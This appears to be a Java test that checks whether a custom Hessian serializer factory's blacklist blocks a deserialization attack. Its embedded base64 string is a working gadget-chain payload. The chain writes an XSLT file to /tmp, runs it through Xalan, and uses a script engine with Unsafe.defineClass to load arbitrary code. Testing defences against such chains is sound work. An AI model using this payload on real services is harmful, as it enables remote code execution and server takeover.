package com.hzk.safe.payload.serializable.hessian.test;

import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import com.hzk.safe.payload.serializable.hessian.factory.NativeHessianSerializerFactory;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.Base64;

public class HessianPayloadTest {

    public static void main(String[] args) throws Exception {
        String base64code = "chRqYXZhLnV0aWwuTGlua2VkTGlzdEhNFmphdmF4LnN3aW5nLlVJRGVmYXVsdHMNZ2FkZ2V0LWNoYWluc0MYc3VuLnN3aW5nLlN3aW5nTGF6eVZhbHVlkwljbGFzc05hbWUKbWV0aG9kTmFtZQRhcmdzYDA4Y29tLnN1bi5vcmcuYXBhY2hlLnhtbC5pbnRlcm5hbC5zZWN1cml0eS51dGlscy5KYXZhVXRpbHMUd3JpdGVCeXRlc1RvRmlsZW5hbWVyB1tvYmplY3QWL3RtcC9fdG9tY2F0X2RhdGFfdGVtcEILwTx4c2w6c3R5bGVzaGVldCB2ZXJzaW9uPSIxLjAiIHhtbG5zOnhzbD0iaHR0cDovL3d3dy53My5vcmcvMTk5OS9YU0wvVHJhbnNmb3JtIgp4bWxuczpvYj0iaHR0cDovL3htbC5hcGFjaGUub3JnL3hhbGFuL2phdmEvamF2YS5sYW5nLk9iamVjdCIgCnhtbG5zOmNsYXp6PSJodHRwOi8veG1sLmFwYWNoZS5vcmcveGFsYW4vamF2YS9qYXZhLmxhbmcuQ2xhc3MiIAp4bWxuczpiYXNlPSJodHRwOi8veG1sLmFwYWNoZS5vcmcveGFsYW4vamF2YS9qYXZheC54bWwuYmluZC5EYXRhdHlwZUNvbnZlcnRlciIKeG1sbnM6c3RyaW5nY2xheno9Imh0dHA6Ly94bWwuYXBhY2hlLm9yZy94YWxhbi9qYXZhL2phdmEubGFuZy5TdHJpbmciCnhtbG5zOmpzY2xheno9Imh0dHA6Ly94bWwuYXBhY2hlLm9yZy94YWxhbi9qYXZhL2phdmF4LnNjcmlwdC5TY3JpcHRFbmdpbmVNYW5hZ2VyIgp4bWxuczpqc2VjbGF6ej0iaHR0cDovL3htbC5hcGFjaGUub3JnL3hhbGFuL2phdmEvamF2YXguc2NyaXB0LlNjcmlwdEVuZ2luZSIKPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSIvIj4KICAgICA8eHNsOnZhcmlhYmxlIG5hbWU9InBheWxvYWQiIHNlbGVjdD0ic3RyaW5nY2xheno6bmV3KGJhc2U6cGFyc2VCYXNlNjRCaW5hcnkoJ2RtRnlJSE1nUFNBbmVYWTJOblpuUVVGQlJFbEJVVUZGUVZwWE9YbGFlVGxvWTBkR2FtRkhWWFpaTWpsellrZFdhbVJIYkhaaWJrMTJXVEk1TldJelVteE1NMDVzWTJrNWNHSllRbk5NTVVKNVlqTkNiR051VWpWUmJVWjZXbGRTVUZsdGNHeFpNMUpLV2tWa2JHSnRWbmxaV0ZKMlkycENhazVFU1RKTmFsVTBUMVJhYVZscVVtdE9SRnBvVGtSbk1GbFVhR3BaYW1kNlRWUm9hMWw2Um0xQ2QwRkNRVkZCVVdGdFJqSlpVemx6V1ZjMWJrd3dPV2xoYlZacVpFRmpRVUYzUlVGQ1IwcG9ZekpWUWtGQ1NrMWhiVVl5V1ZNNWMxbFhOVzVNTVU0d1kyMXNkVnA2YzBKQlFVNTZXbGhCUWtGQlRtcGlWMUZDUVVGWk9HRlhOWEJrUkRSQ1FVRk5iMHRXV1VKQlFrNXhXVmhhYUV3eWVHaGliV04yVWxob2FscFlRakJoVnpsMVFuZEJURVJCUVVwQlFXOUxRVUZSUVVSUlJVRkNNamw2VEcwMWFHSlhWVWxCUVRoQ1FVSkNjVmxZV21oTU1uaG9ZbTFqZGxVemJIcGtSMVowUW5kQlVrRlJRVXhhTWxZd1ZVaEtkbU5IVm5sa1NHdENRVU5aYjFSSGNHaGtiVVYyWWtkR2RWcDVPVlJrU0Vwd1ltMWpOMHRWZUhGWldGcG9UREo0YUdKdFkzWlZNMUo1WVZjMWJrOTNkMEZGZDBGVlEyZEJVMEZDVlVKQlFrSnhXVmhhYUV3eWVHaGliV04yVlROU2VXRlhOVzVDZDBGWVFWRkJUR1JIT1UxaU0yUnNZMnRPYUdNeVZVSkJRbEZ2UzFWNGNWbFlXbWhNTW5ob1ltMWpkbFV6VW5saFZ6VnVUM2QzUVVkUlFXRkRaMEZaUVVKelFrRkJUak5oVnpSSlFVSXdRa0ZCYUdwaU1qVXdXVmRzZFdOM1JVRkhlV2hOWVcxR01sbFRPWE5aVnpWdVREQk9iMWxZU2xSYVdFWXhXbGMxYWxwVWMzQlhaM2RCU0hkQlowTm5RVmxCUTBWQ1FVRmthbUpYVVhWYVdHaHNRMEZCYWtSQlFVWkJRVmxLUVVGSlFVcFJSVUZCYVRscVEwRkJia1JCUVVoQlFWbEtRVUZKUVV0UlJVRkNlVGxwWVZjMGRtTXlaMGxCUTNOQ1FVRkpkRmwzWjBGTVVYZEJRMEZCUjBOUlFVTkJRemhDUVVKb2NWbFlXbWhNTW5ob1ltMWpkbFZJU25aWk1sWjZZekJLTVdGWGVHdGFXRWxJUVVSRlFrRkNXVzlYTUhoeFdWaGFhRXd5ZUdoaWJXTjJWVE5TZVdGWE5XNVBlV3hYUkVGQlNrRkVUVXRCUkVsQlRrRkZRVUpZVGpCWldFb3dRVkZCVmt0RGJFMWhiVVl5V1ZNNWMxbFhOVzVNTVVKNVlqSk9iR016VFRkRVFVRXlRVVJqUzBGRVNVRlBRVVZCUTBSNGFtSkhiSFZoV0ZFclFWRkJSVmt5Um5OWmQyZEJUM2R2UVVGblFVNUJVVUZGVVRJNWExcFJSVUZFVms0d1dWZE9jbFJYUm5kV1IwWnBZa2RWUVVsUlFVTkJRVkZCUVVGQlJFRkJhMEZDVVVGSFFVRkJRVU5SUVVoQlFWbEJRVUZCU2tGQlowRkNaMEZCUVVGSlFVRlJRVXBCUVc5QlFWRkJLMEZCUVVGb1FVRkZRVUZKUVVGQlFsUkxjbU5CUkdoSlVYVkJRVmQwWjBGalJXZzJNa0ZEUzFwQlFrRlRTa3hOUVVwb1NXOXpkMEZ4Y0hkQlRrVnBlWHBCUTFsVFRISk5RVXRuWVRsQlFtaGFRVGRKUVVwc1RscENURWxCUzJ4T1drSmlTVUZOUms1TmRYZEJlVmRUZFROQlJGY3lRVVJzV0hCM1FVVlVURVZCUVZGQlJVRkZORUZWVVVGTlFVRkZRVkIzUVVGQlFtTkJRbEE0UVVsUlFVSkNkMEZEUVVGQlNscFJZMEZFVUhkQlFVRmpRVUpCUVVsQlJHOUJRMmRCUWtGRU5FRkJRVUZoUVVGSlFVRkJRVUZCUVRSVFVFeE5RVTFNYzBGQmJHMHpRVVF4V0hOUlFVRkJRVUZCUVVFOVBTYzdkbUZ5SUhSb1pWVnVjMkZtWlUxbGRHaHZaQ0E5SUdwaGRtRXViR0Z1Wnk1RGJHRnpjeTVtYjNKT1lXMWxLQ2R6ZFc0dWJXbHpZeTVWYm5OaFptVW5LUzVuWlhSRVpXTnNZWEpsWkVacFpXeGtLQ2QwYUdWVmJuTmhabVVuS1R0MGFHVlZibk5oWm1WTlpYUm9iMlF1YzJWMFFXTmpaWE56YVdKc1pTaDBjblZsS1R0MWJuTmhabVVnUFNCMGFHVlZibk5oWm1WTlpYUm9iMlF1WjJWMEtHNTFiR3dwTzNaaGNpQmpiR0Z6YzBKNWRHVnpJRDBnYW1GMllTNXNZVzVuTGtOc1lYTnpMbVp2Y2s1aGJXVW9KM04xYmk1dGFYTmpMa0pCVTBVMk5FUmxZMjlrWlhJbktTNXVaWGRKYm5OMFlXNWpaU2dwTG1SbFkyOWtaVUoxWm1abGNpaHpLVHQxYm5OaFptVXVaR1ZtYVc1bFEyeGhjM01vYm5Wc2JDd2dZMnhoYzNOQ2VYUmxjeXdnTUN3Z1kyeGhjM05DZVhSbGN5NXNaVzVuZEdnc0lHNTFiR3dzSUc1MWJHd3BMbTVsZDBsdWMzUmhibU5sS0NrNycpKSIvPgogICAgICA8eHNsOnZhcmlhYmxlIG5hbWU9Impzb2JqIiBzZWxlY3Q9ImpzY2xheno6bmV3KCkiLz4KICAgICA8eHNsOnZhcmlhYmxlIG5hbWU9ImpzbyIgc2VsZWN0PSJqc2NsYXp6OmdldEVuZ2luZUJ5TmFtZSgkanNvYmosJ2pzJykiLz4KICAgICA8eHNsOnZhcmlhYmxlIG5hbWU9ImpzZSIgc2VsZWN0PSJqc2VjbGF6ejpldmFsKCRqc28sJHBheWxvYWQpIi8+CiAgICAgPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9IiRqc2UiLz4KCiAgICA8L3hzbDp0ZW1wbGF0ZT4KICA8L3hzbDpzdHlsZXNoZWV0PlpRkk2RDWdhZGdldC1jaGFpbnNRk1pRlVpITZENZ2FkZ2V0LWNoYWluc2AwLmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0LlByb2Nlc3MFX21haW5xknMHW3N0cmluZwMtWFQELVhTTB1maWxlOi8vL3RtcC9fdG9tY2F0X2RhdGFfdGVtcFpRl02RDWdhZGdldC1jaGFpbnNRmFpRm1o=";
        byte[] decodeBytes = Base64.getDecoder().decode(base64code);

        try {
            Object deserialize1 = deserialize(decodeBytes);
            System.out.println("check blacklist result=false");
        } catch (SecurityException se) {
            se.printStackTrace();
            System.err.println("check blacklist result=true");
        }


    }

    private static Object deserialize(byte[] bytes) throws Exception {
        try (ByteArrayInputStream bis = new ByteArrayInputStream(bytes)) {
            Hessian2Input h2i = new Hessian2Input(bis);
            h2i.setSerializerFactory(NativeHessianSerializerFactory.SERIALIZER_FACTORY);
            return h2i.readObject();
        }
    }


    private static byte[] serialize(Object object) {
        try (ByteArrayOutputStream bos = new ByteArrayOutputStream()) {
            Hessian2Output h2o = new Hessian2Output(bos);
//            h2o.setSerializerFactory(NativeHessianSerializerFactory.SERIALIZER_FACTORY);
            h2o.writeObject(object);
            h2o.flush();
            return bos.toByteArray();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }



}
